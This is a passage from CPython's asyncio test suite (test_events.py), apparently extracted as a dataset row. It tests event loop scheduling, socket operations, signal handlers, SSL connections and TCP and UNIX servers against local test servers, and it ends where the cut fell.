source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
test_events.py | """Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
def osx_tiger():
    """Return True if the platform is Mac OS 10.4 or older."""
    if sys.platform != 'darwin':
        return False
    release = platform.mac_ver()[0]
    parts = tuple(int(piece) for piece in release.split('.'))
    return parts < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
    """Object that structurally resembles a coroutine.

    Implements the four coroutine-protocol methods (send/throw/close/
    __await__) as no-ops; presumably used to exercise duck-typed coroutine
    checks elsewhere in the test suite — confirm against callers.
    """

    def send(self, v):
        pass

    def throw(self, *exc):
        pass

    def close(self):
        pass

    def __await__(self):
        pass
class MyBaseProto(asyncio.Protocol):
    """Stream protocol that tracks its lifecycle state and counts bytes.

    When a *loop* is supplied, ``connected`` and ``done`` are futures that
    are resolved by connection_made() and connection_lost() respectively.
    """

    # Class-level defaults so instances built without a loop stay falsy.
    connected = None
    done = None

    def __init__(self, loop=None):
        self.transport = None
        self.state = 'INITIAL'
        self.nbytes = 0
        if loop is None:
            return
        self.connected = asyncio.Future(loop=loop)
        self.done = asyncio.Future(loop=loop)

    def connection_made(self, transport):
        self.transport = transport
        assert self.state == 'INITIAL', self.state
        self.state = 'CONNECTED'
        if self.connected is not None:
            self.connected.set_result(None)

    def data_received(self, data):
        assert self.state == 'CONNECTED', self.state
        self.nbytes = self.nbytes + len(data)

    def eof_received(self):
        assert self.state == 'CONNECTED', self.state
        self.state = 'EOF'

    def connection_lost(self, exc):
        assert self.state in ('CONNECTED', 'EOF'), self.state
        self.state = 'CLOSED'
        if self.done is not None:
            self.done.set_result(None)
class MyProto(MyBaseProto):
    """MyBaseProto variant that issues an HTTP GET as soon as it connects."""

    def connection_made(self, transport):
        # Let the base class establish state/futures, then fire the request.
        super().connection_made(transport)
        transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
    """Datagram protocol that tracks its lifecycle and counts payload bytes."""

    # Future resolved on connection_lost() when a loop is supplied.
    done = None

    def __init__(self, loop=None):
        self.state = 'INITIAL'
        self.nbytes = 0
        if loop is not None:
            self.done = asyncio.Future(loop=loop)

    def connection_made(self, transport):
        self.transport = transport
        assert self.state == 'INITIAL', self.state
        self.state = 'INITIALIZED'

    def datagram_received(self, data, addr):
        assert self.state == 'INITIALIZED', self.state
        self.nbytes = self.nbytes + len(data)

    def error_received(self, exc):
        # Errors are tolerated; only the lifecycle state is sanity-checked.
        assert self.state == 'INITIALIZED', self.state

    def connection_lost(self, exc):
        assert self.state == 'INITIALIZED', self.state
        self.state = 'CLOSED'
        if self.done is not None:
            self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
    """Read-pipe protocol that appends each lifecycle step to a state list."""

    done = None

    def __init__(self, loop=None):
        self.state = ['INITIAL']
        self.nbytes = 0
        self.transport = None
        if loop is not None:
            self.done = asyncio.Future(loop=loop)

    def connection_made(self, transport):
        self.transport = transport
        assert self.state == ['INITIAL'], self.state
        self.state.append('CONNECTED')

    def data_received(self, data):
        assert self.state == ['INITIAL', 'CONNECTED'], self.state
        self.nbytes = self.nbytes + len(data)

    def eof_received(self):
        assert self.state == ['INITIAL', 'CONNECTED'], self.state
        self.state.append('EOF')

    def connection_lost(self, exc):
        # A missed EOF is forgiven: synthesize it before closing.
        if 'EOF' not in self.state:
            self.state.append('EOF')
        assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
        self.state.append('CLOSED')
        if self.done is not None:
            self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
    """Write-pipe protocol: tracks connect/close only, no data callbacks."""

    done = None

    def __init__(self, loop=None):
        self.state = 'INITIAL'
        self.transport = None
        if loop is not None:
            self.done = asyncio.Future(loop=loop)

    def connection_made(self, transport):
        self.transport = transport
        assert self.state == 'INITIAL', self.state
        self.state = 'CONNECTED'

    def connection_lost(self, exc):
        assert self.state == 'CONNECTED', self.state
        self.state = 'CLOSED'
        if self.done is not None:
            self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
    """Subprocess protocol that records stdout/stderr data and exit status."""

    def __init__(self, loop):
        self.state = 'INITIAL'
        self.transport = None
        self.returncode = None
        # Futures resolved as the subprocess moves through its lifecycle.
        self.connected = asyncio.Future(loop=loop)
        self.completed = asyncio.Future(loop=loop)
        self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
        # Accumulated output and "data arrived" events, keyed by fd
        # (1 == stdout, 2 == stderr).
        self.data = {fd: b'' for fd in (1, 2)}
        self.got_data = {fd: asyncio.Event(loop=loop) for fd in (1, 2)}

    def connection_made(self, transport):
        self.transport = transport
        assert self.state == 'INITIAL', self.state
        self.state = 'CONNECTED'
        self.connected.set_result(None)

    def connection_lost(self, exc):
        assert self.state == 'CONNECTED', self.state
        self.state = 'CLOSED'
        self.completed.set_result(None)

    def pipe_data_received(self, fd, data):
        assert self.state == 'CONNECTED', self.state
        self.data[fd] += data
        self.got_data[fd].set()

    def pipe_connection_lost(self, fd, exc):
        assert self.state == 'CONNECTED', self.state
        if exc:
            self.disconnects[fd].set_exception(exc)
        else:
            self.disconnects[fd].set_result(exc)

    def process_exited(self):
        assert self.state == 'CONNECTED', self.state
        self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
    def setUp(self):
        """Create the loop under test and install it as the current loop."""
        super().setUp()
        self.loop = self.create_event_loop()
        self.set_event_loop(self.loop)
    def tearDown(self):
        """Flush pending callbacks, run cleanups, then collect garbage."""
        # just in case if we have transport close callbacks
        if not self.loop.is_closed():
            test_utils.run_briefly(self.loop)

        self.doCleanups()
        support.gc_collect()
        super().tearDown()
    def test_run_until_complete_nesting(self):
        """run_until_complete() must refuse to nest inside a running loop."""
        @asyncio.coroutine
        def coro1():
            yield

        @asyncio.coroutine
        def coro2():
            self.assertTrue(self.loop.is_running())
            self.loop.run_until_complete(coro1())

        self.assertRaises(
            RuntimeError, self.loop.run_until_complete, coro2())
    # Note: because of the default Windows timing granularity of
    # 15.6 msec, we use fairly long sleep times here (~100 msec).

    def test_run_until_complete(self):
        """run_until_complete() returns only after the coroutine finishes."""
        t0 = self.loop.time()
        self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
        t1 = self.loop.time()
        # Generous upper bound to tolerate slow/loaded CI machines.
        self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
    def test_run_until_complete_stopped(self):
        """Stopping the loop mid-task makes run_until_complete() raise."""

        async def cb():
            self.loop.stop()
            await asyncio.sleep(0.1, loop=self.loop)
        task = cb()
        self.assertRaises(RuntimeError,
                          self.loop.run_until_complete, task)
    def test_call_later(self):
        """call_later() runs the callback once, after roughly the delay."""
        results = []

        def callback(arg):
            results.append(arg)
            self.loop.stop()

        self.loop.call_later(0.1, callback, 'hello world')
        t0 = time.monotonic()
        self.loop.run_forever()
        t1 = time.monotonic()
        self.assertEqual(results, ['hello world'])
        self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
    def test_call_soon(self):
        """call_soon() passes positional args through to the callback."""
        results = []

        def callback(arg1, arg2):
            results.append((arg1, arg2))
            self.loop.stop()

        self.loop.call_soon(callback, 'hello', 'world')
        self.loop.run_forever()
        self.assertEqual(results, [('hello', 'world')])
    def test_call_soon_threadsafe(self):
        """call_soon_threadsafe() from another thread wakes the loop."""
        results = []
        lock = threading.Lock()

        def callback(arg):
            results.append(arg)
            if len(results) >= 2:
                self.loop.stop()

        def run_in_thread():
            self.loop.call_soon_threadsafe(callback, 'hello')
            lock.release()

        # The lock is held until the helper thread has scheduled 'hello',
        # so it is guaranteed to be queued before 'world'.
        lock.acquire()
        t = threading.Thread(target=run_in_thread)
        t.start()

        with lock:
            self.loop.call_soon(callback, 'world')
            self.loop.run_forever()
        t.join()
        self.assertEqual(results, ['hello', 'world'])
    def test_call_soon_threadsafe_same_thread(self):
        """call_soon_threadsafe() also works from the loop's own thread."""
        results = []

        def callback(arg):
            results.append(arg)
            if len(results) >= 2:
                self.loop.stop()

        self.loop.call_soon_threadsafe(callback, 'hello')
        self.loop.call_soon(callback, 'world')
        self.loop.run_forever()
        self.assertEqual(results, ['hello', 'world'])
    def test_run_in_executor(self):
        """run_in_executor(None, ...) runs the function in another thread."""

        def run(arg):
            return (arg, threading.get_ident())
        f2 = self.loop.run_in_executor(None, run, 'yo')
        res, thread_id = self.loop.run_until_complete(f2)
        self.assertEqual(res, 'yo')
        self.assertNotEqual(thread_id, threading.get_ident())
    def test_reader_callback(self):
        """add_reader() invokes the callback whenever the fd is readable."""
        r, w = socket.socketpair()
        r.setblocking(False)
        bytes_read = bytearray()

        def reader():
            try:
                data = r.recv(1024)
            except BlockingIOError:
                # Spurious readiness notifications are possible
                # at least on Linux -- see man select.
                return
            if data:
                bytes_read.extend(data)
            else:
                # Empty read means EOF: the writer side was closed.
                self.assertTrue(self.loop.remove_reader(r.fileno()))
                r.close()

        self.loop.add_reader(r.fileno(), reader)
        self.loop.call_soon(w.send, b'abc')
        test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
        self.loop.call_soon(w.send, b'def')
        test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
        self.loop.call_soon(w.close)
        self.loop.call_soon(self.loop.stop)
        self.loop.run_forever()
        self.assertEqual(bytes_read, b'abcdef')
    def test_writer_callback(self):
        """add_writer()/remove_writer() drive a write-ready callback."""
        r, w = socket.socketpair()
        w.setblocking(False)

        def writer(data):
            w.send(data)
            self.loop.stop()

        data = b'x' * 1024
        self.loop.add_writer(w.fileno(), writer, data)
        self.loop.run_forever()

        # First removal succeeds; the second reports nothing left to remove.
        self.assertTrue(self.loop.remove_writer(w.fileno()))
        self.assertFalse(self.loop.remove_writer(w.fileno()))

        w.close()
        read = r.recv(len(data) * 2)
        r.close()
        self.assertEqual(read, data)
    def _basetest_sock_client_ops(self, httpd, sock):
        """Exercise the sock_* loop APIs against *httpd* using *sock*."""
        if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
            # in debug mode, socket operations must fail
            # if the socket is not in blocking mode
            self.loop.set_debug(True)
            sock.setblocking(True)
            with self.assertRaises(ValueError):
                self.loop.run_until_complete(
                    self.loop.sock_connect(sock, httpd.address))
            with self.assertRaises(ValueError):
                self.loop.run_until_complete(
                    self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
            with self.assertRaises(ValueError):
                self.loop.run_until_complete(
                    self.loop.sock_recv(sock, 1024))
            with self.assertRaises(ValueError):
                self.loop.run_until_complete(
                    self.loop.sock_recv_into(sock, bytearray()))
            with self.assertRaises(ValueError):
                self.loop.run_until_complete(
                    self.loop.sock_accept(sock))

        # test in non-blocking mode
        sock.setblocking(False)
        self.loop.run_until_complete(
            self.loop.sock_connect(sock, httpd.address))
        self.loop.run_until_complete(
            self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
        data = self.loop.run_until_complete(
            self.loop.sock_recv(sock, 1024))
        # consume data
        self.loop.run_until_complete(
            self.loop.sock_recv(sock, 1024))
        sock.close()
        self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
    def _basetest_sock_recv_into(self, httpd, sock):
        """Like _basetest_sock_client_ops, but receiving via sock_recv_into."""
        # same as _basetest_sock_client_ops, but using sock_recv_into
        sock.setblocking(False)
        self.loop.run_until_complete(
            self.loop.sock_connect(sock, httpd.address))
        self.loop.run_until_complete(
            self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
        data = bytearray(1024)
        # memoryview slices let us receive into the buffer without copies.
        with memoryview(data) as buf:
            nbytes = self.loop.run_until_complete(
                self.loop.sock_recv_into(sock, buf[:1024]))
            # consume data
            self.loop.run_until_complete(
                self.loop.sock_recv_into(sock, buf[nbytes:]))
        sock.close()
        self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
    def test_sock_client_ops(self):
        """Run the sock_* smoke tests against a local TCP HTTP server."""
        with test_utils.run_test_server() as httpd:
            sock = socket.socket()
            self._basetest_sock_client_ops(httpd, sock)
            sock = socket.socket()
            self._basetest_sock_recv_into(httpd, sock)
    @support.skip_unless_bind_unix_socket
    def test_unix_sock_client_ops(self):
        """Run the sock_* smoke tests against a local UNIX-domain server."""
        with test_utils.run_test_unix_server() as httpd:
            sock = socket.socket(socket.AF_UNIX)
            self._basetest_sock_client_ops(httpd, sock)
            sock = socket.socket(socket.AF_UNIX)
            self._basetest_sock_recv_into(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
    def test_sock_accept(self):
        """sock_accept() returns a non-blocking connection and peer address."""
        listener = socket.socket()
        listener.setblocking(False)
        listener.bind(('127.0.0.1', 0))
        listener.listen(1)
        client = socket.socket()
        client.connect(listener.getsockname())

        f = self.loop.sock_accept(listener)
        conn, addr = self.loop.run_until_complete(f)
        # gettimeout() == 0 means the accepted socket is non-blocking.
        self.assertEqual(conn.gettimeout(), 0)
        self.assertEqual(addr, client.getsockname())
        self.assertEqual(client.getpeername(), listener.getsockname())
        client.close()
        conn.close()
        listener.close()
    @unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
    def test_add_signal_handler(self):
        """add/remove_signal_handler(): argument validation and dispatch."""
        caught = 0

        def my_handler():
            nonlocal caught
            caught += 1

        # Check error behavior first.
        self.assertRaises(
            TypeError, self.loop.add_signal_handler, 'boom', my_handler)
        self.assertRaises(
            TypeError, self.loop.remove_signal_handler, 'boom')
        self.assertRaises(
            ValueError, self.loop.add_signal_handler, signal.NSIG+1,
            my_handler)
        self.assertRaises(
            ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
        self.assertRaises(
            ValueError, self.loop.add_signal_handler, 0, my_handler)
        self.assertRaises(
            ValueError, self.loop.remove_signal_handler, 0)
        self.assertRaises(
            ValueError, self.loop.add_signal_handler, -1, my_handler)
        self.assertRaises(
            ValueError, self.loop.remove_signal_handler, -1)
        self.assertRaises(
            RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
            my_handler)
        # Removing SIGKILL doesn't raise, since we don't call signal().
        self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
        # Now set a handler and handle it.
        self.loop.add_signal_handler(signal.SIGINT, my_handler)

        os.kill(os.getpid(), signal.SIGINT)
        test_utils.run_until(self.loop, lambda: caught)

        # Removing it should restore the default handler.
        self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
        self.assertEqual(signal.getsignal(signal.SIGINT),
                         signal.default_int_handler)
        # Removing again returns False.
        self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
    @unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
    def test_signal_handling_while_selecting(self):
        """A signal arriving while the loop is blocked is still handled."""
        # Test with a signal actually arriving during a select() call.
        caught = 0

        def my_handler():
            nonlocal caught
            caught += 1
            self.loop.stop()

        self.loop.add_signal_handler(signal.SIGALRM, my_handler)

        signal.setitimer(signal.ITIMER_REAL, 0.01, 0)  # Send SIGALRM once.
        self.loop.run_forever()
        self.assertEqual(caught, 1)
    @unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
    def test_signal_handling_args(self):
        """Extra args given to add_signal_handler() reach the handler."""
        some_args = (42,)
        caught = 0

        def my_handler(*args):
            nonlocal caught
            caught += 1
            self.assertEqual(args, some_args)

        self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)

        signal.setitimer(signal.ITIMER_REAL, 0.1, 0)  # Send SIGALRM once.
        self.loop.call_later(0.5, self.loop.stop)
        self.loop.run_forever()
        self.assertEqual(caught, 1)
    def _basetest_create_connection(self, connection_fut, check_sockname=True):
        """Await *connection_fut* and sanity-check the transport/protocol."""
        tr, pr = self.loop.run_until_complete(connection_fut)
        self.assertIsInstance(tr, asyncio.Transport)
        self.assertIsInstance(pr, asyncio.Protocol)
        self.assertIs(pr.transport, tr)
        if check_sockname:
            self.assertIsNotNone(tr.get_extra_info('sockname'))
        self.loop.run_until_complete(pr.done)
        self.assertGreater(pr.nbytes, 0)
        tr.close()
    def test_create_connection(self):
        """create_connection() to a local TCP server yields a working pair."""
        with test_utils.run_test_server() as httpd:
            conn_fut = self.loop.create_connection(
                lambda: MyProto(loop=self.loop), *httpd.address)
            self._basetest_create_connection(conn_fut)
    @support.skip_unless_bind_unix_socket
    def test_create_unix_connection(self):
        """create_unix_connection() to a local UNIX-domain server works."""
        # Issue #20682: On Mac OS X Tiger, getsockname() returns a
        # zero-length address for UNIX socket.
        check_sockname = not osx_tiger()

        with test_utils.run_test_unix_server() as httpd:
            conn_fut = self.loop.create_unix_connection(
                lambda: MyProto(loop=self.loop), httpd.address)
            self._basetest_create_connection(conn_fut, check_sockname)
    def test_create_connection_sock(self):
        """create_connection(sock=...) adopts an already-connected socket."""
        with test_utils.run_test_server() as httpd:
            sock = None
            infos = self.loop.run_until_complete(
                self.loop.getaddrinfo(
                    *httpd.address, type=socket.SOCK_STREAM))
            for family, type, proto, cname, address in infos:
                try:
                    sock = socket.socket(family=family, type=type, proto=proto)
                    sock.setblocking(False)
                    self.loop.run_until_complete(
                        self.loop.sock_connect(sock, address))
                # NOTE(review): bare except also swallows KeyboardInterrupt /
                # SystemExit; `except OSError:` would likely suffice here.
                except:
                    pass
                else:
                    break
            else:
                assert False, 'Can not create socket.'

            f = self.loop.create_connection(
                lambda: MyProto(loop=self.loop), sock=sock)
            tr, pr = self.loop.run_until_complete(f)
            self.assertIsInstance(tr, asyncio.Transport)
            self.assertIsInstance(pr, asyncio.Protocol)
            self.loop.run_until_complete(pr.done)
            self.assertGreater(pr.nbytes, 0)
            tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
    def _basetest_create_ssl_connection(self, connection_fut,
                                        check_sockname=True,
                                        peername=None):
        """Await an SSL connection and validate transport + extra info."""
        tr, pr = self.loop.run_until_complete(connection_fut)
        self.assertIsInstance(tr, asyncio.Transport)
        self.assertIsInstance(pr, asyncio.Protocol)
        # The transport class name identifies it as an SSL transport.
        self.assertTrue('ssl' in tr.__class__.__name__.lower())
        self.check_ssl_extra_info(tr, check_sockname, peername)
        self.loop.run_until_complete(pr.done)
        self.assertGreater(pr.nbytes, 0)
        tr.close()
    def _test_create_ssl_connection(self, httpd, create_connection,
                                    check_sockname=True, peername=None):
        """Drive *create_connection* with several ssl= argument variants."""
        conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
        self._basetest_create_ssl_connection(conn_fut, check_sockname,
                                             peername)

        # ssl.Purpose was introduced in Python 3.4
        if hasattr(ssl, 'Purpose'):
            def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
                                          cafile=None, capath=None,
                                          cadata=None):
                """
                A ssl.create_default_context() replacement that doesn't enable
                cert validation.
                """
                self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
                return test_utils.dummy_ssl_context()

            # With ssl=True, ssl.create_default_context() should be called
            with mock.patch('ssl.create_default_context',
                            side_effect=_dummy_ssl_create_context) as m:
                conn_fut = create_connection(ssl=True)
                self._basetest_create_ssl_connection(conn_fut, check_sockname,
                                                     peername)
                self.assertEqual(m.call_count, 1)

        # With the real ssl.create_default_context(), certificate
        # validation will fail
        with self.assertRaises(ssl.SSLError) as cm:
            conn_fut = create_connection(ssl=True)
            # Ignore the "SSL handshake failed" log in debug mode
            with test_utils.disable_logger():
                self._basetest_create_ssl_connection(conn_fut, check_sockname,
                                                     peername)

        self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_create_ssl_connection(self):
        """create_connection() over TLS against a local HTTPS server."""
        with test_utils.run_test_server(use_ssl=True) as httpd:
            create_connection = functools.partial(
                self.loop.create_connection,
                lambda: MyProto(loop=self.loop),
                *httpd.address)
            self._test_create_ssl_connection(httpd, create_connection,
                                             peername=httpd.address)
    @support.skip_unless_bind_unix_socket
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_create_ssl_unix_connection(self):
        """create_unix_connection() over TLS against a local server."""
        # Issue #20682: On Mac OS X Tiger, getsockname() returns a
        # zero-length address for UNIX socket.
        check_sockname = not osx_tiger()

        with test_utils.run_test_unix_server(use_ssl=True) as httpd:
            create_connection = functools.partial(
                self.loop.create_unix_connection,
                lambda: MyProto(loop=self.loop), httpd.address,
                server_hostname='127.0.0.1')

            self._test_create_ssl_connection(httpd, create_connection,
                                             check_sockname,
                                             peername=httpd.address)
    def test_create_connection_local_addr(self):
        """local_addr= binds the client socket to the requested port."""
        with test_utils.run_test_server() as httpd:
            port = support.find_unused_port()
            f = self.loop.create_connection(
                lambda: MyProto(loop=self.loop),
                *httpd.address, local_addr=(httpd.address[0], port))
            tr, pr = self.loop.run_until_complete(f)
            expected = pr.transport.get_extra_info('sockname')[1]
            self.assertEqual(port, expected)
            tr.close()
    def test_create_connection_local_addr_in_use(self):
        """Binding local_addr to an in-use address raises EADDRINUSE."""
        with test_utils.run_test_server() as httpd:
            f = self.loop.create_connection(
                lambda: MyProto(loop=self.loop),
                *httpd.address, local_addr=httpd.address)
            with self.assertRaises(OSError) as cm:
                self.loop.run_until_complete(f)
            self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
            self.assertIn(str(httpd.address), cm.exception.strerror)
    def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
        """connect_accepted_socket() wraps an accepted socket in a transport."""
        loop = self.loop

        class MyProto(MyBaseProto):
            # Local subclass: echo a canned response on data, and stop the
            # loop once the connection goes away.

            def connection_lost(self, exc):
                super().connection_lost(exc)
                loop.call_soon(loop.stop)

            def data_received(self, data):
                super().data_received(data)
                self.transport.write(expected_response)

        lsock = socket.socket()
        lsock.bind(('127.0.0.1', 0))
        lsock.listen(1)
        addr = lsock.getsockname()

        message = b'test data'
        response = None
        expected_response = b'roger'

        def client():
            nonlocal response
            try:
                csock = socket.socket()
                if client_ssl is not None:
                    csock = client_ssl.wrap_socket(csock)
                csock.connect(addr)
                csock.sendall(message)
                response = csock.recv(99)
                csock.close()
            except Exception as exc:
                print(
                    "Failure in client thread in test_connect_accepted_socket",
                    exc)

        thread = threading.Thread(target=client, daemon=True)
        thread.start()

        conn, _ = lsock.accept()
        proto = MyProto(loop=loop)
        proto.loop = loop
        loop.run_until_complete(
            loop.connect_accepted_socket(
                (lambda: proto), conn, ssl=server_ssl))
        loop.run_forever()
        proto.transport.close()
        lsock.close()

        support.join_thread(thread, timeout=1)
        self.assertFalse(thread.is_alive())
        self.assertEqual(proto.state, 'CLOSED')
        self.assertEqual(proto.nbytes, len(message))
        self.assertEqual(response, expected_response)
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_ssl_connect_accepted_socket(self):
        """Same as test_connect_accepted_socket(), but with TLS both ways."""
        if (sys.platform == 'win32' and
            sys.version_info < (3, 5) and
            isinstance(self.loop, proactor_events.BaseProactorEventLoop)
        ):
            raise unittest.SkipTest(
                'SSL not supported with proactor event loops before Python 3.5'
            )

        server_context = test_utils.simple_server_sslcontext()
        client_context = test_utils.simple_client_sslcontext()

        self.test_connect_accepted_socket(server_context, client_context)
    def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
        """Passing ssl_handshake_timeout without ssl= must be rejected."""
        sock = socket.socket()
        self.addCleanup(sock.close)
        coro = self.loop.connect_accepted_socket(
            MyProto, sock, ssl_handshake_timeout=1)
        with self.assertRaisesRegex(
                ValueError,
                'ssl_handshake_timeout is only meaningful with ssl'):
            self.loop.run_until_complete(coro)
    @mock.patch('asyncio.base_events.socket')
    def create_server_multiple_hosts(self, family, hosts, mock_sock):
        """Helper: create_server() on several hosts with sockets mocked out.

        Duplicate entries in *hosts* must collapse to one listening socket
        per unique host.
        """
        @asyncio.coroutine
        def getaddrinfo(host, port, *args, **kw):
            if family == socket.AF_INET:
                return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
            else:
                return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]

        def getaddrinfo_task(*args, **kwds):
            return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)

        unique_hosts = set(hosts)

        if family == socket.AF_INET:
            mock_sock.socket().getsockbyname.side_effect = [
                (host, 80) for host in unique_hosts]
        else:
            mock_sock.socket().getsockbyname.side_effect = [
                (host, 80, 0, 0) for host in unique_hosts]
        self.loop.getaddrinfo = getaddrinfo_task
        self.loop._start_serving = mock.Mock()
        self.loop._stop_serving = mock.Mock()
        f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
        server = self.loop.run_until_complete(f)
        self.addCleanup(server.close)
        server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
        self.assertEqual(server_hosts, unique_hosts)
    def test_create_server_multiple_hosts_ipv4(self):
        """Duplicate IPv4 hosts collapse to one listening socket each."""
        self.create_server_multiple_hosts(socket.AF_INET,
                                          ['1.2.3.4', '5.6.7.8', '1.2.3.4'])
    def test_create_server_multiple_hosts_ipv6(self):
        """Duplicate IPv6 hosts collapse to one listening socket each."""
        self.create_server_multiple_hosts(socket.AF_INET6,
                                          ['::1', '::2', '::1'])
    def test_create_server(self):
        """create_server() accepts a connection and exposes extra info."""
        proto = MyProto(self.loop)
        f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
        server = self.loop.run_until_complete(f)
        self.assertEqual(len(server.sockets), 1)
        sock = server.sockets[0]
        host, port = sock.getsockname()
        self.assertEqual(host, '0.0.0.0')
        client = socket.socket()
        client.connect(('127.0.0.1', port))
        client.sendall(b'xxx')

        self.loop.run_until_complete(proto.connected)
        self.assertEqual('CONNECTED', proto.state)

        test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
        self.assertEqual(3, proto.nbytes)

        # extra info is available
        self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
        self.assertEqual('127.0.0.1',
                         proto.transport.get_extra_info('peername')[0])

        # close connection
        proto.transport.close()
        self.loop.run_until_complete(proto.done)

        self.assertEqual('CLOSED', proto.state)

        # the client socket must be closed after to avoid ECONNRESET upon
        # recv()/send() on the serving socket
        client.close()

        # close server
        server.close()
    @unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
    def test_create_server_reuse_port(self):
        """reuse_port=True sets SO_REUSEPORT; the default leaves it unset."""
        proto = MyProto(self.loop)
        f = self.loop.create_server(
            lambda: proto, '0.0.0.0', 0)
        server = self.loop.run_until_complete(f)
        self.assertEqual(len(server.sockets), 1)
        sock = server.sockets[0]
        self.assertFalse(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEPORT))
        server.close()

        test_utils.run_briefly(self.loop)

        proto = MyProto(self.loop)
        f = self.loop.create_server(
            lambda: proto, '0.0.0.0', 0, reuse_port=True)
        server = self.loop.run_until_complete(f)
        self.assertEqual(len(server.sockets), 1)
        sock = server.sockets[0]
        self.assertTrue(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEPORT))
        server.close()
    def _make_unix_server(self, factory, **kwargs):
        """Start a UNIX server on a fresh socket path; return (server, path)."""
        path = test_utils.gen_unix_socket_path()
        # Remove the socket file on cleanup (if the server left one behind).
        self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))

        f = self.loop.create_unix_server(factory, path, **kwargs)
        server = self.loop.run_until_complete(f)

        return server, path
    @support.skip_unless_bind_unix_socket
    def test_create_unix_server(self):
        """create_unix_server() accepts a connection and receives data."""
        proto = MyProto(loop=self.loop)
        server, path = self._make_unix_server(lambda: proto)
        self.assertEqual(len(server.sockets), 1)
        client = socket.socket(socket.AF_UNIX)
        client.connect(path)
        client.sendall(b'xxx')

        self.loop.run_until_complete(proto.connected)
        self.assertEqual('CONNECTED', proto.state)
        test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
        self.assertEqual(3, proto.nbytes)

        # close connection
        proto.transport.close()
        self.loop.run_until_complete(proto.done)

        self.assertEqual('CLOSED', proto.state)

        # the client socket must be closed after to avoid ECONNRESET upon
        # recv()/send() on the serving socket
        client.close()

        # close server
        server.close()
    @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
